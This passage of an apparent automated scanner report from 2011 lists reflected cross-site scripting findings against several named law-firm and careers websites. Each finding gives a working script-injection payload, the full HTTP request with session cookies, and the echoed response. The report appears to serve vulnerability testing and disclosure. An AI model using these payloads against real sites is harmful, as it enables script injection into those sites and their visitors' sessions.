<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practices/32?5ffd5"><script>alert(1)</script>f69cf4179ca=1');" title="Email Page">
...[SNIP]...
5.50. http://www.ober.com/practices/55 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/55

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df1a1"><script>alert(1)</script>3f7b6752e35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practicesdf1a1"><script>alert(1)</script>3f7b6752e35/55 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/32
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:56:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6378
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practicesdf1a1"><script>alert(1)</script>3f7b6752e35/55');" title="Email Page">
...[SNIP]...
5.51. http://www.ober.com/practices/55 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/55

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bfce"><script>alert(1)</script>81849066b8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices/553bfce"><script>alert(1)</script>81849066b8f HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/32
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:56:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6378
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practices/553bfce"><script>alert(1)</script>81849066b8f');" title="Email Page">
...[SNIP]...
5.52. http://www.ober.com/practices/55 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/55

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 723e3"><script>alert(1)</script>2c1db03c1b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices/55?723e3"><script>alert(1)</script>2c1db03c1b2=1 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/32
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:56:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practices/55?723e3"><script>alert(1)</script>2c1db03c1b2=1');" title="Email Page">
...[SNIP]...
5.53. http://www.ober.com/practices/index [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd414"><script>alert(1)</script>b9377a17930 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practicesfd414"><script>alert(1)</script>b9377a17930/index HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:54:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6384
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practicesfd414"><script>alert(1)</script>b9377a17930/index');" title="Email Page">
...[SNIP]...
5.54. http://www.ober.com/practices/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3007"><script>alert(1)</script>db34a33627e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices/indexf3007"><script>alert(1)</script>db34a33627e HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:54:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6384
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practices/indexf3007"><script>alert(1)</script>db34a33627e');" title="Email Page">
...[SNIP]...
5.55. http://www.ober.com/practices/index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6995b"><script>alert(1)</script>0cfd5d55e38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices/index?6995b"><script>alert(1)</script>0cfd5d55e38=1 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:54:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 7905
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practices/index?6995b"><script>alert(1)</script>0cfd5d55e38=1');" title="Email Page">
...[SNIP]...
5.56. http://www.ober.com/practices/intellectual-property [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/intellectual-property

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0776"><script>alert(1)</script>9729acb6496 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practicesd0776"><script>alert(1)</script>9729acb6496/intellectual-property HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/index
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:55:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6416
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practicesd0776"><script>alert(1)</script>9729acb6496/intellectual-property');" title="Email Page">
...[SNIP]...
5.57. http://www.ober.com/practices/intellectual-property [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/intellectual-property

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf5b"><script>alert(1)</script>d2e5c8c671f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices/intellectual-propertyeaf5b"><script>alert(1)</script>d2e5c8c671f HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/index
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:55:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6416
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practices/intellectual-propertyeaf5b"><script>alert(1)</script>d2e5c8c671f');" title="Email Page">
...[SNIP]...
5.58. http://www.ober.com/practices/intellectual-property [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/intellectual-property

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544f4"><script>alert(1)</script>7e4ef0247c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices/intellectual-property?544f4"><script>alert(1)</script>7e4ef0247c9=1 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/index
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:55:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practices/intellectual-property?544f4"><script>alert(1)</script>7e4ef0247c9=1');" title="Email Page">
...[SNIP]...
5.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f59f"><a>64d87eead7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /connect_forgotpassword.cfm?p=99&1f59f"><a>64d87eead7d=1 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" class="formelement2" NAME="referringPage" VALUE="http://www.pillsburylaw.com/index.cfm?p=99&1f59f"><a>64d87eead7d=1">
...[SNIP]...
5.60. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e46e6"><img%20src%3da%20onerror%3dalert(1)>1c24eada36d was submitted in the p parameter. This input was echoed as e46e6"><img src=a onerror=alert(1)>1c24eada36d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /connect_forgotpassword.cfm?p=99e46e6"><img%20src%3da%20onerror%3dalert(1)>1c24eada36d HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" name="p" value="99e46e6"><img src=a onerror=alert(1)>1c24eada36d" />
...[SNIP]...
5.61. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8f6"><a>f6ac5f771fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?pageID=60&ec8f6"><a>f6ac5f771fa=1 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<a href="printfriendly.cfm?pageID=60&ec8f6"><a>f6ac5f771fa=1&printF=1" target="_blank">
...[SNIP]...
5.62. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript inline comment. The payload 94f32*/alert(1)//eb441a1d940 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/94f32*/alert(1)//eb441a1d940/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:00:52 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL08DA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAIIqRNk!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000mcxy3Y0syMfbFIqm_y6U2O0:140i3s34m; Path=/
Keep-Alive: timeout=10, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:26:37 GMT;path=/
Content-Length: 72003


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
alse , hideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/94f32*/alert(1)//eb441a1d940'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger'
...[SNIP]...
5.63. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d464a"><script>alert(1)</script>25a04331083 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP?d464a"><script>alert(1)</script>25a04331083=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:56 GMT
Server: IBM_HTTP_Server
